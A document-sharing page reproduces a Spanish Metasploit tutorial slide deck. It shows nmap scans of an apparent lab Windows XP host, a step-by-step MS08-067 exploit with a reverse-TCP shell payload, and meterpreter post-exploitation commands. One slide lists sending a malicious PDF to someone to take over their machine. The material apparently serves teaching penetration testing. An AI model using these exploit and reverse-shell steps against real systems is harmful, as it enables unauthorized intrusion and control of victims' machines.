+ All Categories
Home > Documents > Metasploit2

Metasploit2

Date post: 02-Dec-2015
Category:

Documents
Upload: kwabenasapong8671
View: 6 times
Download: 0 times
Download Report this document
Share this document with a friend
Description:
metasploit
Popular Tags:
tcp msf exploitms08
netapi msf exploitms08
tcp open ftp
tcp open unknown
tcp open smtp
tcp open https
tcp open nfs
tcp open mssql
32
Transcript
Page 1: Metasploit2
Page 2: Metasploit2
Page 3: Metasploit2
Page 4: Metasploit2
Page 5: Metasploit2

• REALIZAR ESCANEO DE PUERTOS

• VULNERAR SERVIDOR APACHE Y TOMAR CONTROL DE LA MÁQUINA QUE LO CORRE

• GENERAR PDF MALICIOSO(VIRUS) ENVIARLO A ALGUIEN Y TOMAR EL CONTROL DE LA MÁQUINA DE ESE ALGUIEN =P

• OTRO HACK MÁS SI ES QUE DA TIEMPO

Page 6: Metasploit2

root@bt:~#nmap –sS –Pn ip

• -sS <=Determina si un puerto esta abierto (TCP)

• -Pn <=Le dice a nmap que no use ping para determinar si un sistema esta activo

(útil cuando en la red no se permiten paquetes ICMP)

Page 7: Metasploit2

root@bt:~# nmap -sS -Pn 172.16.32.131 Nmap scan report for 172.16.32.131 Host is up (0.00057s latency). Not shown: 990 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s 3389/tcp open ms-term-serv Nmap done: 1 IP address (1 host up) scanned in 14.34 seconds

Page 8: Metasploit2

root@bt:~#nmap –sS –Pn –A ip

• -A <= nmap intentara hacer una enumeración de servicio

Page 9: Metasploit2

root@bt:~# nmap -Pn -sS -A 172.16.32.131 Nmap scan report for 172.16.32.131 Host is up (0.0035s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 777/tcp open unknown 1138/tcp open msrpc Microsoft Windows RPC 1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM Device type: general purpose Running: Microsoft Windows XP|2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows Host script results: |_nbstat: NetBIOS name: V-MAC-XP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c9:38:4c (VMware) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Name: WORKGROUP\V-MAC-XP

Page 10: Metasploit2

root@bt:~#nc ip puerto

• GET / HTTP 1.0

• HEAD / HTTP 1.0

• POST / HTTP 1.0

Page 11: Metasploit2

• msf> show exploits | grep exploit

• msf> show auxiliary

• msf> search mysql

• msf exploit(ms08_067_netapi) >show targets

• msf exploit(ms08_067_netapi) >info

Page 12: Metasploit2

• msf> use windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > back

• msf> show options

• msf > show payloads

• msf exploit(ms08_067_netapi) >set payload windows/shell/reverse_tcp

• msf exploit(ms08_067_netapi) >set RHOST ip

• msf exploit(ms08_067_netapi) >set LHOST ip

• msf exploit(ms08_067_netapi) >set LPORT port

• msf exploit(ms08_067_netapi) >exploit

Page 13: Metasploit2

• msf exploit(ms08_067_netapi) >sessions

• msf exploit(ms08_067_netapi) >sessions –i 1

Page 14: Metasploit2

• meterpreter>screenshot

• meterpreter>sysinfo

• meterpreter>ps

• meterpreter>migrate 1668

• meterpreter>getuid

• meterpreter>shell

Page 15: Metasploit2
Page 16: Metasploit2
Page 17: Metasploit2
Page 18: Metasploit2
Page 19: Metasploit2
Page 20: Metasploit2
Page 21: Metasploit2
Page 22: Metasploit2
Page 23: Metasploit2
Page 24: Metasploit2
Page 25: Metasploit2
Page 26: Metasploit2
Page 27: Metasploit2
Page 28: Metasploit2
Page 29: Metasploit2
Page 30: Metasploit2
Page 31: Metasploit2
Page 32: Metasploit2